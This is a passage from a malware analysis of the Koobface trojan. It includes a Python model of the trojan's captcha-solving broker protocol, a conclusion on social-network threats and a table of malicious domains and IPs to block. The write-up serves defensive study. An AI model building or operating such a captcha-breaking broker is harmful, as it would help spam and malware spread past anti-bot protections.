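PATTERN = r"([a-zA-Z0-9\$\.\,\/]+)([ ]+)([a-zA-Z0-9\$\.\,\/]+)"


class CaptchaBroker:
    """In-memory model of the /captcha/ endpoint on capthcabreak.com as this post
    describes it. Status 3 = solved is from the post; answering 0 while a task is
    still pending, the starting task id and the regex check are assumptions."""

    SOLVED = 3

    def __init__(self):
        self._ids = count(11623014)   # seed mirrors the task id in the capture above
        self.tasks = {}               # task id -> {"kind", "image", "solution"}
        self.queue = []               # ids not yet handed to a solver
        self.pending = set()          # ids handed out, waiting for a=put

    # submitter side (v2newblogger.exe): a=save, then poll a=query
    def save(self, kind, image):
        tid = str(next(self._ids))
        self.tasks[tid] = {"kind": kind, "image": image, "solution": None}
        self.queue.append(tid)
        return tid

    def query(self, tid):
        solution = self.tasks[tid]["solution"]
        return "0" if solution is None else f"{self.SOLVED}|{solution}"

    # solver side (v2captcha.exe): a=get, then a=put with the typed answer
    def get(self):
        if not self.queue:
            return "0"
        tid = self.queue.pop(0)
        self.pending.add(tid)
        return f"{tid}|http://captcha.com/captcha/tmp/{tid}.jpg|{PROMPT}|{PATTERN}"

    def put(self, tid, code):
        # an answer must be outstanding and must fit the format the task advertised
        if tid not in self.pending or not re.fullmatch(PATTERN, code):
            return False
        self.pending.remove(tid)
        self.tasks[tid]["solution"] = code
        return True


def parse_task(reply):
    """Solver-side parsing of the a=get reply: None when nothing is queued."""
    if reply == "0":
        return None
    tid, image_url, prompt, pattern = reply.split("|", 3)
    return tid, image_url, prompt, pattern


if __name__ == "__main__":
    broker = CaptchaBroker()
    tid = broker.save("goo", b"\xff\xd8 constructed jpeg bytes")
    task = parse_task(broker.get())
    print(broker.put(task[0], "misterwis schole"), broker.query(tid))
```

The regex check in put() is where a broker would drop garbage typed by an annoyed user; the post’s observation that the module checks at least the length of the input fits that design.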

*** Conclusion ***
In most cases the binaries dropped by Koobface have a very good AV detection rate. However, the Koobface trojan has some sophisticated tricks to spread itself. It is the first “big” trojan which uses social networks to spread. So the question arises whether social networks are a threat to corporate networks and whether they should be banned from the office.

Another problem is the module which checks whether a Blogspot / bit.ly URL is already blocked on Facebook. The Koobface gang knows how many fake URLs are currently active and how many are banned from Facebook. So it is nearly useless to ban the fake URLs on Facebook and try to suspend/delete the involved Blogspot / bit.ly URLs: Koobface needs just a few minutes to react and create new fake Blogspot / bit.ly URLs for its infection process.

Another point is that everyone is talking about “Web 2.0”, but most people are unaware of Web 2.0 threats. As I said before, Koobface is the first big social network trojan, but I’m quite sure it won’t be the last. Trojans which use Web 2.0 to spread don’t need to care about spam filters and e-mail addresses; they bypass the corporate (strong) e-mail filter by using Web 2.0.

Finally, the security industry has to ask itself whether captchas are still secure. The fact that there is already a commercial “Captcha Decoder Servis” worries me.

*** Domains to block ***
The following domains should be blocked on corporate gateways/firewalls:

Domain            A record       AS number  AS name                            Country
uuu20091124.info  67.212.78.65   10929      Netelligent Hosting Services Inc.  Canada
captchastop.com   67.212.69.230  10929      Netelligent Hosting Services Inc.  Canada
capthcabreak.com  67.212.69.230  10929      Netelligent Hosting Services Inc.  Canada
ze-biz.com        85.13.236.154  31708      COREIX-UK-AS Coreix Limited        United Kingdom

